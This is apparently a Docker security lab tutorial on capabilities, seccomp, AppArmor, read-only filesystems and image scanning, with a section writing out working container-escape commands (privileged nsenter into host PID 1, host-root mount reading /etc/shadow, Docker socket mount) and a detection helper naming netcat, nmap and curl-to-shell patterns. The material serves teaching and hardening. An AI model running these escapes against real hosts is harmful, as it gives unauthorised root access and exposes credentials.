Docker Security Examples

Containers share the host kernel — the only barriers between a container process and full host compromise are Linux security primitives: namespaces, cgroups, capabilities, seccomp, and mandatory access control (AppArmor/SELinux). Understanding how these controls work, and how attackers bypass them, is fundamental to securing any container workload.

This tutorial walks through practical Docker security scenarios:

  1. Linux capabilities: drop all, add only what's needed, and observe the difference
  2. Seccomp profiles: restrict which syscalls a container can make
  3. AppArmor profiles: mandatory access control for file and network operations
  4. Privilege escalation techniques: how --privileged, --pid=host with nsenter, host filesystem mounts (-v /:/host), and a mounted Docker socket give attackers full host access
  5. Read-only filesystems: prevent runtime tampering with --read-only and tmpfs
  6. Host network dangers: why --network=host removes network isolation
  7. Image inspection: audit layers and scan for vulnerabilities before running

Each example is designed to be run locally with Docker — no Kubernetes cluster required.


Prerequisites

  • Docker installed and running
  • Basic familiarity with Linux permissions and processes
  • A terminal (all examples use the standard Docker CLI)

Create a working directory for the lab:

mkdir -p ~/docker-security-lab && cd ~/docker-security-lab

Linux Capabilities

Linux capabilities split the monolithic root privilege into discrete units. Instead of granting a process full root power, you grant only the specific capabilities it needs. Docker containers start with a reduced capability set, but it's still more than most workloads require.

View Default Container Capabilities

# Run a container and list its capabilities
docker run --rm -it alpine:latest /bin/sh -c "apk add -q libcap && capsh --print"

The output shows the capability bounding set — these are the maximum privileges available to processes inside the container.
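
If you would rather not install libcap in the container, the kernel exposes the same sets as hex masks in the CapEff, CapPrm, and CapBnd fields of /proc/<pid>/status. The sketch below decodes such a mask in plain shell. decode_caps is a hypothetical helper name, not part of Docker, and the name order is assumed to follow the bit numbering in linux/capability.h.

```shell
# decode_caps (hypothetical helper): turn a capability hex mask, as found in
# the Cap* fields of /proc/<pid>/status, into a list of capability names.
decode_caps() {
    mask=$((0x$1))
    # Names in bit order (bit 0 = CHOWN), following linux/capability.h.
    names="CHOWN DAC_OVERRIDE DAC_READ_SEARCH FOWNER FSETID KILL SETGID SETUID
           SETPCAP LINUX_IMMUTABLE NET_BIND_SERVICE NET_BROADCAST NET_ADMIN
           NET_RAW IPC_LOCK IPC_OWNER SYS_MODULE SYS_RAWIO SYS_CHROOT SYS_PTRACE
           SYS_PACCT SYS_ADMIN SYS_BOOT SYS_NICE SYS_RESOURCE SYS_TIME
           SYS_TTY_CONFIG MKNOD LEASE AUDIT_WRITE AUDIT_CONTROL SETFCAP
           MAC_OVERRIDE MAC_ADMIN SYSLOG WAKE_ALARM BLOCK_SUSPEND AUDIT_READ
           PERFMON BPF CHECKPOINT_RESTORE"
    bit=0
    out=""
    for name in $names; do
        # Keep the name if the corresponding bit is set in the mask.
        if [ $(( (mask >> bit) & 1 )) -eq 1 ]; then
            out="${out:+$out }$name"
        fi
        bit=$((bit + 1))
    done
    printf '%s\n' "$out"
}

# Example: a mask with bits 10 and 13 set.
decode_caps 0000000000002400   # prints: NET_BIND_SERVICE NET_RAW
```

To use it against a real container, run docker run --rm alpine:latest grep CapEff /proc/self/status and pass the hex value it prints to decode_caps.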

Drop All Capabilities

Dropping all capabilities is the most restrictive baseline. Most applications will still run — they just can't perform privileged operations like binding to low ports, changing file ownership, or sending raw network packets.

# Drop ALL capabilities — ping fails because it needs CAP_NET_RAW
docker run --rm --cap-drop ALL alpine:latest /bin/sh -c \
    "ping -c1 -W2 127.0.0.1"

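Expected output: ping: permission denied (are you running as root?)

On Docker Engine 20.10 and later the ping may succeed anyway, because the daemon sets net.ipv4.ping_group_range inside the container so that unprivileged ICMP sockets are allowed. If that happens, run grep Cap /proc/self/status in the container to confirm that the capability sets are empty.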

Add Back Only What's Needed

# Add CAP_NET_RAW back — ping works again
docker run --rm --cap-drop ALL --cap-add NET_RAW alpine:latest /bin/sh -c \
    "ping -c1 -W2 127.0.0.1"

Expected output: 1 packets transmitted, 1 packets received, 0% packet loss

Common Capabilities and Their Risk

Capability        What it allows                          Risk level
NET_RAW           Raw sockets (ping, packet crafting)     Medium: enables ARP spoofing
NET_ADMIN         Network configuration changes           High: can sniff traffic, modify routes
SYS_ADMIN         Mount filesystems, manage namespaces    Critical: near-root access
SYS_PTRACE        Trace and debug processes               High: can read memory of other processes
DAC_OVERRIDE      Bypass file permission checks           High: read/write any file
SETUID / SETGID   Change process UID/GID                  High: escalate to any user

Best practice: Always use --cap-drop ALL as the baseline and add back only the specific capabilities your application requires. Document why each capability is needed.

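# Example: nginx binding to port 80. The official image starts as root and
# then switches to the nginx user, so it typically also needs CHOWN, SETGID, and SETUID.
docker run --rm --cap-drop ALL \
    --cap-add NET_BIND_SERVICE --cap-add CHOWN \
    --cap-add SETGID --cap-add SETUID \
    -p 8080:80 nginx:alpine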

Seccomp Profiles

Seccomp (Secure Computing Mode) filters which system calls a container process can execute. Docker applies a default seccomp profile that blocks approximately 44 of the 300+ Linux syscalls, including dangerous ones like mount, reboot, and kexec_load.

Running Without Seccomp (Dangerous)

Disabling seccomp removes all syscall filtering — the container process can invoke any syscall the kernel supports.

# Without seccomp: unshare succeeds — the process can create new namespaces
docker run --rm -it --security-opt seccomp=unconfined alpine:latest \
    unshare --map-root-user --user /bin/sh -c "whoami && id"

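This succeeds only because seccomp is disabled. unshare(2) with the CLONE_NEWUSER flag creates a new user namespace, and Docker's default seccomp profile allows the unshare syscall only in containers that hold CAP_SYS_ADMIN.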

Running With the Default Profile

# With default seccomp: unshare is blocked
docker run --rm -it alpine:latest \
    unshare --map-root-user --user /bin/sh -c "whoami && id"

Expected: unshare: unshare(0x10000000): Operation not permitted
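
To confirm which mode a container is actually running in, you can read the Seccomp field of /proc/<pid>/status (0 = disabled, 1 = strict, 2 = filter). The helper below is a minimal sketch; seccomp_mode is a hypothetical name chosen for this example.

```shell
# seccomp_mode (hypothetical helper): read /proc/<pid>/status text on stdin
# and print the seccomp mode of that process in words.
seccomp_mode() {
    awk '/^Seccomp:/ {
        if ($2 == 0) print "disabled"
        else if ($2 == 1) print "strict"
        else if ($2 == 2) print "filter"
        else print "unknown"
    }'
}

# Example with a captured status fragment.
printf 'Name:\tsh\nSeccomp:\t2\nSeccomp_filters:\t1\n' | seccomp_mode   # prints: filter
```

Piping docker run --rm alpine:latest cat /proc/self/status into seccomp_mode should report filter under the default profile and disabled when the container is started with --security-opt seccomp=unconfined.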

Using a Custom Seccomp Profile

Download Docker's default profile and customize it:

# Download the default seccomp profile
curl -sO https://raw.githubusercontent.com/moby/moby/master/profiles/seccomp/default.json

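# Count the syscall names in the profile's allow rules
# (some of these rules are conditional on capabilities or architecture)
python3 -c 'import json; p = json.load(open("default.json")); print(sum(len(s["names"]) for s in p["syscalls"] if s["action"] == "SCMP_ACT_ALLOW"))'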

Create a stricter profile that also blocks chmod and chown:

cat > strict-seccomp.json << 'SECCOMP'
{
    "defaultAction": "SCMP_ACT_ERRNO",
    "defaultErrnoRet": 1,
    "architectures": [
        "SCMP_ARCH_X86_64",
        "SCMP_ARCH_AARCH64"
    ],
    "syscalls": [
        {
            "names": [
                "accept", "accept4", "access", "bind", "brk", "capget",
                "capset", "chdir", "clone", "close", "connect", "dup",
                "dup2", "dup3", "epoll_create", "epoll_create1",
                "epoll_ctl", "epoll_wait", "epoll_pwait", "execve",
                "exit", "exit_group", "faccessat", "fchdir", "fcntl",
                "fstat", "fstatfs", "futex", "getcwd", "getdents64",
                "getegid", "geteuid", "getgid", "getpeername",
                "getpid", "getppid", "getrandom", "getsockname",
                "getsockopt", "getuid", "ioctl", "listen", "lseek",
                "madvise", "mmap", "mprotect", "munmap", "nanosleep",
                "newfstatat", "open", "openat", "pipe", "pipe2",
                "poll", "ppoll", "prctl", "pread64", "prlimit64",
                "pwrite64", "read", "readlink", "readlinkat",
                "recvfrom", "recvmsg", "rename", "rt_sigaction",
                "rt_sigprocmask", "rt_sigreturn", "select",
                "sendmsg", "sendto", "set_robust_list",
                "set_tid_address", "setsockopt", "shutdown",
                "sigaltstack", "socket", "stat", "statfs",
                "sysinfo", "tgkill", "uname", "unlink", "wait4",
                "write", "writev"
            ],
            "action": "SCMP_ACT_ALLOW"
        }
    ]
}
SECCOMP

# Run with the strict profile: chmod is now blocked
docker run --rm -it --security-opt seccomp=./strict-seccomp.json \
    alpine:latest /bin/sh -c "touch /tmp/test && chmod 777 /tmp/test"

Expected: chmod: /tmp/test: Operation not permitted
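
Before running a container under an allowlist profile, it can help to check which syscalls the file actually permits. The sketch below does this with a plain text match. syscall_allowed and report_syscalls are hypothetical helper names, and the approach assumes a profile whose only rule is a single SCMP_ACT_ALLOW list, like strict-seccomp.json.

```shell
# syscall_allowed PROFILE NAME (hypothetical helper): succeed if the quoted
# syscall name appears in the profile file. This is a text match, so it is
# only meaningful when every listed name belongs to an SCMP_ACT_ALLOW rule.
syscall_allowed() {
    grep -qF "\"$2\"" "$1"
}

# report_syscalls PROFILE NAME...: print one verdict line per syscall name.
report_syscalls() {
    profile=$1
    shift
    for name in "$@"; do
        if syscall_allowed "$profile" "$name"; then
            echo "$name: allowed"
        else
            echo "$name: blocked"
        fi
    done
}

# Example: check a few syscalls if the profile from this section exists.
if [ -f strict-seccomp.json ]; then
    report_syscalls strict-seccomp.json read chmod chown
fi
```

If a container fails to start under a custom profile, the same check is a quick way to see whether a syscall the runtime or libc needs is missing from the list.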


AppArmor Profiles

AppArmor provides mandatory access control at the filesystem and network level. Docker's default AppArmor profile (docker-default) restricts containers from writing to /proc and /sys, mounting filesystems, and accessing certain devices.

Check the Default AppArmor Profile

# Verify AppArmor is loaded (Linux hosts only)
sudo aa-status 2>/dev/null | head -20

# Run with the default profile explicitly
docker run --rm -it --security-opt apparmor=docker-default \
    alpine:latest /bin/sh -c "cat /proc/sysrq-trigger"

Create a Custom AppArmor Profile

Write a restrictive profile that prevents a container from writing to anything except /tmp:

sudo tee /etc/apparmor.d/docker-restricted << 'EOF'
#include <tunables/global>

profile docker-restricted flags=(attach_disconnected,mediate_deleted) {
    #include <abstractions/base>

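    # Allow reading and executing most paths (ix: the child inherits this profile).
    # Without an execute rule, the shell could not run external commands such as cat.
    / r,
    /** rix,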

    # Only allow writes to /tmp
    /tmp/** rw,

    # Deny writes everywhere else
    deny /etc/** w,
    deny /usr/** w,
    deny /var/** w,
    deny /home/** w,
    deny /root/** w,

    # Deny raw network access
    deny network raw,

    # Deny mount operations
    deny mount,

    # Allow necessary capabilities
    capability net_bind_service,
    capability setuid,
    capability setgid,
}
EOF

# Load the profile
sudo apparmor_parser -r /etc/apparmor.d/docker-restricted

# Test: writing to /etc fails
docker run --rm -it --security-opt apparmor=docker-restricted \
    alpine:latest /bin/sh -c "echo test > /etc/test.txt"

# Test: writing to /tmp succeeds
docker run --rm -it --security-opt apparmor=docker-restricted \
    alpine:latest /bin/sh -c "echo test > /tmp/test.txt && cat /tmp/test.txt"
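
To verify that a container is really confined by the profile you named, you can read /proc/<pid>/attr/current, which holds either "unconfined" or the profile name followed by its mode in parentheses. The helper below is a small sketch for splitting that value; apparmor_profile is a hypothetical name.

```shell
# apparmor_profile (hypothetical helper): read the contents of
# /proc/<pid>/attr/current on stdin and print "<profile> <mode>".
apparmor_profile() {
    sed -e 's/^\(.*\) (\(.*\))$/\1 \2/' \
        -e 's/^unconfined$/unconfined none/'
}

# Example with a captured value.
echo 'docker-restricted (enforce)' | apparmor_profile   # prints: docker-restricted enforce
```

For a live check, pipe the output of docker run --rm --security-opt apparmor=docker-restricted alpine:latest cat /proc/self/attr/current into apparmor_profile.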

Privilege Escalation Techniques

Understanding how attackers escalate privileges from inside a container helps you defend against these patterns. Each technique below exploits a specific Docker misconfiguration.

Technique 1: --privileged Flag

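The --privileged flag removes most container isolation: the container receives every capability, seccomp and AppArmor confinement are disabled, and the device cgroup restrictions are lifted so that all host devices are accessible. The namespaces remain in place, but a root process in a privileged container can do almost anything a root process on the host can.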

# Privileged container can see ALL host devices
docker run --rm -it --privileged alpine:latest /bin/sh -c \
    "fdisk -l 2>/dev/null | head -20"

The container can see and interact with host block devices, mount host filesystems, load kernel modules, and access every hardware device.

Technique 2: nsenter with Host PID Namespace

When a container shares the host's PID namespace (--pid=host), it can see all host processes. Combined with --privileged, nsenter lets you enter the host's mount, UTS, network, and IPC namespaces — effectively escaping the container entirely.

# Full host escape: nsenter into PID 1 (the host's init process)
docker run --rm -it --privileged --pid=host alpine:latest \
    nsenter -t 1 -m -u -n -i /bin/sh -c "hostname && whoami && cat /etc/hostname"

What each nsenter flag does:

Flag   Namespace   Effect
-t 1   Target      Attach to PID 1 (host init)
-m     Mount       See the host filesystem
-u     UTS         See the host hostname
-n     Network     See the host network stack
-i     IPC         See the host IPC resources

The command above runs three commands as root on the host and exits. Without the -c argument, it gives you an interactive root shell on the host. From there, you can read /etc/shadow, install packages, modify systemd services, or pivot to other machines on the network.

Technique 3: Host Filesystem Mount

Mounting the host root filesystem into a container provides direct read/write access to everything on the host:

# Mount the host root filesystem at /host
docker run --rm -it -v /:/host alpine:latest /bin/sh -c \
    "chroot /host /bin/sh -c 'cat /etc/shadow | head -5'"

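This works without --privileged: the Docker daemon runs as root and performs the bind mount for any user who is allowed to talk to it. The chroot then switches the process's root directory to the host filesystem, so it can read and modify every host file, although it still runs inside the container's other namespaces.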

Technique 4: Docker Socket Mount

Mounting the Docker socket gives the container control over the Docker daemon — it can create new privileged containers, access volumes, and effectively control the host:

# Mount the Docker socket — the container can now manage Docker
docker run --rm -it -v /var/run/docker.sock:/var/run/docker.sock \
    docker:latest docker ps

From here, an attacker can launch a privileged container with the host filesystem mounted — achieving full host compromise in two steps.

Defense: Never mount the Docker socket into application containers. Use rootless Docker or Podman for environments where containers need to build other containers.
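
The four misconfigurations above are easy to spot mechanically before a container is started. The following sketch checks the arguments of a docker run command for them. audit_run_flags is a hypothetical helper, and the pattern list is deliberately incomplete (it does not cover --mount or --volume=... spellings, for example).

```shell
# audit_run_flags (hypothetical helper): pass it the arguments of a
# `docker run` command. It prints one warning per risky option it recognises
# and returns non-zero if it found any.
audit_run_flags() {
    found=0
    prev=""
    for arg in "$@"; do
        case "$arg" in
            --privileged|--privileged=true)
                echo "WARN: --privileged removes most isolation"; found=1 ;;
            --pid=host)
                echo "WARN: --pid=host exposes host processes"; found=1 ;;
            */docker.sock:*)
                echo "WARN: Docker socket mounted"; found=1 ;;
            /:*)
                echo "WARN: host root filesystem mounted"; found=1 ;;
        esac
        # Also handle the two-word form: --pid host
        if [ "$prev" = "--pid" ] && [ "$arg" = "host" ]; then
            echo "WARN: --pid=host exposes host processes"; found=1
        fi
        prev=$arg
    done
    return "$found"
}

# Example: the nsenter escape from Technique 2 triggers two warnings.
audit_run_flags --rm -it --privileged --pid=host alpine:latest || echo "risky flags found"
```

A wrapper script or CI job could call this helper and refuse to start the container when it returns non-zero.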


Read-Only Filesystems and tmpfs

Running containers with --read-only prevents any writes to the container's root filesystem. This blocks attackers from downloading tools, modifying configs, or writing persistence mechanisms.

Basic Read-Only Container

# Read-only root filesystem — writes fail
docker run --rm -it --read-only alpine:latest /bin/sh -c \
    "echo 'malware' > /tmp/payload"

Expected: can't create /tmp/payload: Read-only file system

Read-Only with tmpfs for Required Write Paths

Most applications need to write to a few specific paths (temp files, PID files, logs). Use tmpfs mounts for these: they are backed by memory (and swap, if enabled) rather than the container's writable layer, and their contents disappear when the container stops.

# Read-only with tmpfs for /tmp — application writes work, nothing persists
docker run --rm -it --read-only --tmpfs /tmp:rw,noexec,nosuid \
    alpine:latest /bin/sh -c \
    "echo 'tempdata' > /tmp/test && cat /tmp/test && ls -la /tmp/"

Key tmpfs mount options:

Option     Effect
rw         Allow read/write (default for tmpfs)
noexec     Prevent executing binaries from tmpfs; blocks attackers from running downloaded payloads
nosuid     Ignore SUID/SGID bits; prevents privilege escalation via setuid binaries
size=64m   Limit tmpfs size; prevents memory exhaustion attacks
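
To check that a tmpfs mount really carries these options, compare the option string from /proc/mounts (the fourth field of the matching line) against the list above. The sketch below reports which of the hardening options are missing. missing_tmpfs_opts is a hypothetical helper name.

```shell
# missing_tmpfs_opts (hypothetical helper): given a comma-separated mount
# option string, print which of noexec, nosuid, and size= are absent.
missing_tmpfs_opts() {
    opts=",$1,"
    missing=""
    case "$opts" in *,noexec,*) ;; *) missing="$missing noexec" ;; esac
    case "$opts" in *,nosuid,*) ;; *) missing="$missing nosuid" ;; esac
    case "$opts" in *,size=*)   ;; *) missing="$missing size" ;; esac
    # Strip the leading space left by the first append.
    echo "${missing# }"
}

# Example: the options from the command above lack a size limit.
missing_tmpfs_opts "rw,noexec,nosuid"   # prints: size
```

Inside a container, grep ' /tmp ' /proc/mounts shows the options that were actually applied.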

Running as Non-Root with Read-Only Filesystem

Combine --read-only, --tmpfs, non-root user, and dropped capabilities for a hardened container:

# Create a test image with a non-root user
cat > /tmp/Dockerfile.secure << 'EOF'
FROM alpine:latest
RUN adduser -D -u 1000 appuser
USER appuser
WORKDIR /home/appuser
CMD ["sh"]
EOF

# Build from stdin so that the contents of /tmp are not sent to the daemon as build context
docker build -t secure-test - < /tmp/Dockerfile.secure

# Run with full hardening
docker run --rm -it \
    --read-only \
    --tmpfs /tmp:rw,noexec,nosuid,size=64m \
    --cap-drop ALL \
    --security-opt no-new-privileges \
    -u 1000:1000 \
    secure-test /bin/sh -c "whoami && id && touch /tmp/ok && echo 'write works in /tmp'"

The --security-opt no-new-privileges flag prevents the process and its children from gaining additional privileges through setuid/setgid binaries or file capabilities. Even if an attacker finds a setuid binary inside the container, executing it does not raise their privileges.
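
Most of these settings are visible from inside the container in /proc/self/status, which makes them easy to verify. The following sketch summarises four of them from the Uid, CapEff, NoNewPrivs, and Seccomp fields. hardening_report is a hypothetical helper, and the PASS/FAIL wording is only illustrative.

```shell
# hardening_report (hypothetical helper): read /proc/<pid>/status text on
# stdin and print PASS or FAIL for four hardening settings.
hardening_report() {
    awk '
        function verdict(ok) { return ok ? "PASS" : "FAIL" }
        /^Uid:/        { uid = $2 }
        /^CapEff:/     { capeff = $2 }
        /^NoNewPrivs:/ { nnp = $2 }
        /^Seccomp:/    { seccomp = $2 }
        END {
            print verdict(uid != 0) " non-root user"
            print verdict(capeff ~ /^0+$/) " no effective capabilities"
            print verdict(nnp == 1) " no-new-privileges set"
            print verdict(seccomp == 2) " seccomp filter active"
        }'
}

# Example with a captured status fragment from a hardened container.
printf 'Uid:\t1000\t1000\t1000\t1000\nCapEff:\t0000000000000000\nNoNewPrivs:\t1\nSeccomp:\t2\n' \
    | hardening_report
```

To check a real container, run it with cat /proc/self/status as the command and pipe the output into hardening_report.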


Host Network Dangers

Using --network=host removes network namespace isolation — the container shares the host's network stack, can bind to any port, and can sniff all host traffic.

# Host network: nginx binds directly to the host's port 80
docker run --rm -d --network=host --name host-nginx nginx:alpine

# Verify it's listening on the host's network interface
curl -s -o /dev/null -w "%{http_code}" http://localhost:80

# Cleanup
docker stop host-nginx

Why this is dangerous:

  • The container can bind to any port on the host, potentially hijacking services
  • Network monitoring tools inside the container can capture all host traffic
  • The container can communicate with services bound to 127.0.0.1 on the host (databases, admin interfaces)
  • No port mapping is needed — the container bypasses Docker's network proxy entirely

Best practice: Use Docker's bridge network (default) or custom networks. Only use --network=host when absolutely required for performance-critical network applications, and combine it with other security controls.


Image Inspection and Vulnerability Scanning

Before running any image — especially from public registries — inspect its contents and scan for known vulnerabilities.

Inspect Image Layers and History

# Pull an image
docker pull ubuntu/squid:latest

# View the full build history — shows every Dockerfile instruction
docker history --no-trunc ubuntu/squid:latest

Look for suspicious patterns in the history:

  • curl or wget fetching unknown URLs
  • Scripts executed during build (RUN bash -c "...")
  • Environment variables containing credentials or tokens
  • Layers that install tools like netcat, nmap, or socat
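
A first pass over the history can be automated with grep. The sketch below flags lines that match the patterns in the list above. flag_history is a hypothetical helper, and the regular expressions are rough heuristics that will produce both false positives and misses, so treat the output as a prompt for manual review.

```shell
# flag_history (hypothetical helper): read `docker history --no-trunc`
# output on stdin and print the numbered lines that look suspicious.
flag_history() {
    grep -n -i -E \
        -e '(curl|wget)[[:space:]].*https?://' \
        -e '(^|[^[:alnum:]_])(netcat|ncat|nc|nmap|socat)([^[:alnum:]_]|$)' \
        -e '(password|passwd|secret|token|api_?key)[[:alnum:]_]*=' \
        || true   # no match is not an error
}

# Example with made-up history lines (example.invalid is a placeholder host).
printf '%s\n' \
    'RUN /bin/sh -c apt-get update && apt-get install -y squid' \
    'RUN /bin/sh -c curl -fsSL http://example.invalid/setup.sh | sh' \
    'ENV API_TOKEN=abc123' \
    'RUN /bin/sh -c apk add nmap' \
    | flag_history
```

With a real image, the input would come from docker history --no-trunc ubuntu/squid:latest | flag_history.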

Scan with Trivy

# Scan for HIGH and CRITICAL vulnerabilities
trivy image --severity HIGH,CRITICAL ubuntu/squid:latest

# Scan and output as JSON for pipeline integration
trivy image --severity HIGH,CRITICAL -f json -o scan-results.json \
    ubuntu/squid:latest

# Scan a local Dockerfile for misconfigurations
trivy config /tmp/Dockerfile.secure

Inspect a Running Container's Filesystem

# Start a container to inspect
docker run -d --name inspect-target alpine:latest sleep 3600

# Export the filesystem as a tar and examine
docker export inspect-target | tar -tf - | head -50

# Look for suspicious files in writable locations
docker export inspect-target | tar -tf - | grep -E "(tmp|dev/shm|var/tmp)/"

# Check for SUID binaries
docker exec inspect-target find / -perm -4000 -type f 2>/dev/null

# Cleanup
docker stop inspect-target && docker rm inspect-target

Verify Image Signatures with Cosign

For images signed with Sigstore cosign:

# Verify an image signature
cosign verify --key cosign.pub <registry>/<image>:<tag>

# Verify with keyless signing (Sigstore transparency log)
cosign verify \
    --certificate-identity <signer-email> \
    --certificate-oidc-issuer https://accounts.google.com \
    <registry>/<image>:<tag>

Putting It All Together: Secure Container Checklist

Run containers with the maximum practical restrictions:

# Production-hardened container run command
# (the user-defined network must exist first: docker network create my-app-net)
docker run -d \
    --name my-app \
    --read-only \
    --tmpfs /tmp:rw,noexec,nosuid,size=64m \
    --cap-drop ALL \
    --cap-add NET_BIND_SERVICE \
    --security-opt no-new-privileges \
    --security-opt seccomp=./strict-seccomp.json \
    --security-opt apparmor=docker-restricted \
    --memory 512m \
    --cpus 1 \
    --pids-limit 100 \
    -u 1000:1000 \
    --network my-app-net \
    -p 8080:8080 \
    my-app:latest

What each flag does:

Flag                                      Security control
--read-only                               Immutable root filesystem
--tmpfs /tmp:rw,noexec,nosuid,size=64m    Writable temp directory that blocks binary execution
--cap-drop ALL                            Remove all Linux capabilities
--cap-add NET_BIND_SERVICE                Add back only what's needed
--security-opt no-new-privileges          Block SUID/file-capability escalation
--security-opt seccomp=<profile>          Custom syscall filter
--security-opt apparmor=<profile>         Mandatory access control profile
--memory 512m                             Prevent memory exhaustion
--cpus 1                                  Prevent CPU exhaustion
--pids-limit 100                          Prevent fork bombs
-u 1000:1000                              Run as non-root user
--network my-app-net                      Isolated network (not host)

Lab Cleanup

# Remove any lab containers that are still around
docker rm -f inspect-target host-nginx my-app 2>/dev/null

# Remove lab images
docker rmi secure-test 2>/dev/null

# Remove generated files
rm -f strict-seccomp.json default.json scan-results.json
rm -f /tmp/Dockerfile.secure

# Remove custom AppArmor profile (if created)
sudo apparmor_parser -R /etc/apparmor.d/docker-restricted 2>/dev/null
sudo rm -f /etc/apparmor.d/docker-restricted

# Remove lab directory
rm -rf ~/docker-security-lab/

Next Steps